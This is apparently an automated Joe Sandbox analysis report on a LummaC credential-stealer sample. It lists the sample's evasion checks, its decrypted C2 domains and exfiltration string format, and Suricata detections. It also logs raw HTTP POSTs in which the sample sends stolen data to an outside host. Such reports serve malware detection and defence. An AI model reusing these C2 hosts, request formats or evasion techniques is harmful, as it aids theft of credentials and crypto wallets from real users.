Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4KDKJjRzm8.exe

Overview

General Information

Sample name:4KDKJjRzm8.exe
renamed because original name is a hash value
Original sample name:6be43af1d47558e4993b9c341da5a653.exe
Analysis ID:1580888
MD5:6be43af1d47558e4993b9c341da5a653
SHA1:0bef6b68199ee1f205326d3289b39102978ec1f5
SHA256:7e13dd0f50e0ded479413d1061d1d2f73fd2e51639e8b29b22776b4d0ab5368d
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 4KDKJjRzm8.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\4KDKJjRzm8.exe" MD5: 6BE43AF1D47558E4993B9C341DA5A653)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curverpluch.lat", "bashfulacid.lat", "observerfry.lat", "talkynicer.lat", "shapestickyr.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "wordyfindy.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 9 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:09.261620+010020283713Unknown Traffic192.168.2.94972223.55.153.106443TCP
                2024-12-26T12:54:11.746899+010020283713Unknown Traffic192.168.2.949728172.67.157.254443TCP
                2024-12-26T12:54:13.868234+010020283713Unknown Traffic192.168.2.949734172.67.157.254443TCP
                2024-12-26T12:54:16.670208+010020283713Unknown Traffic192.168.2.949740172.67.157.254443TCP
                2024-12-26T12:54:18.942161+010020283713Unknown Traffic192.168.2.949746172.67.157.254443TCP
                2024-12-26T12:54:21.673727+010020283713Unknown Traffic192.168.2.949752172.67.157.254443TCP
                2024-12-26T12:54:24.413493+010020283713Unknown Traffic192.168.2.949761172.67.157.254443TCP
                2024-12-26T12:54:26.955349+010020283713Unknown Traffic192.168.2.949768172.67.157.254443TCP
                2024-12-26T12:54:30.039493+010020283713Unknown Traffic192.168.2.949776172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:12.519459+010020546531A Network Trojan was detected192.168.2.949728172.67.157.254443TCP
                2024-12-26T12:54:14.667605+010020546531A Network Trojan was detected192.168.2.949734172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:12.519459+010020498361A Network Trojan was detected192.168.2.949728172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:14.667605+010020498121A Network Trojan was detected192.168.2.949734172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:07.476243+010020584801Domain Observed Used for C2 Detected192.168.2.9535581.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:07.191673+010020584841Domain Observed Used for C2 Detected192.168.2.9565531.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:06.767453+010020584921Domain Observed Used for C2 Detected192.168.2.9542601.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:06.907983+010020585001Domain Observed Used for C2 Detected192.168.2.9524981.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:06.397092+010020585021Domain Observed Used for C2 Detected192.168.2.9599311.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:07.050281+010020585101Domain Observed Used for C2 Detected192.168.2.9505191.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:07.334564+010020585121Domain Observed Used for C2 Detected192.168.2.9602321.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:06.257510+010020585141Domain Observed Used for C2 Detected192.168.2.9505081.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:25.170601+010020480941Malware Command and Control Activity Detected192.168.2.949761172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:54:10.065762+010028586661Domain Observed Used for C2 Detected192.168.2.94972223.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 4KDKJjRzm8.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/pitTAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/api)Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/sAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/piDAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/pi0Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/pi4Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/iajAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/qoAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/AREAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/stTAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/teAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com//PasswAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/ients/Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apitlyAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apinAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 4KDKJjRzm8.exe.1460.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "bashfulacid.lat", "observerfry.lat", "talkynicer.lat", "shapestickyr.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "wordyfindy.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: 4KDKJjRzm8.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 4KDKJjRzm8.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1368448305.0000000005140000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009957C0 CryptUnprotectData,0_2_009957C0
                Source: 4KDKJjRzm8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49768 version: TLS 1.2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_009C0340
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov edx, ebx0_2_00988600
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov eax, ebx0_2_0099C8A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]0_2_0099C8A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]0_2_0099C8A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]0_2_0099C8A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_0098CC7A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_009C0D20
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AD34A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov eax, ebx0_2_009A7440
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_009A7440
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_009C1720
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009A1A10
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AC09E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AE0DA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AC0E6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_009A81CC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AC09E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov eax, dword ptr [009C6130h]0_2_00998169
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_009B6210
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_009A83D8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov ecx, eax0_2_0099C300
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_009AC465
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009AC465
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov edi, ecx0_2_009AA5B6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_009A8528
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_009C06F0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then push esi0_2_0098C805
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_009A2830
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_009BC830
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then mov byte ptr [edi], al0_2_009AC850
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_009BC990
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_009A89E9

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.9:59931 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.9:52498 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.9:53558 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.9:54260 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.9:56553 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.9:60232 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.9:50519 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.9:50508 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49761 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49722 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49734 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49734 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49728 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49740 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49752 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49761 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49768 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O0KPXZESU3AA06KVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AI1H7NMTB09653LBRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15057Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PCKY9Q7KIM5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y6D6EX0ZTZ3UD39FU1KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4K5AXWGSDPDJ4LFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585194Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: OleMainThreadWndClasscn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowe equals www.youtube.com (Youtube)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowe equals www.youtube.com (Youtube)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowe equals www.youtube.com (Youtube)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ps://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
                Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
                Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
                Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
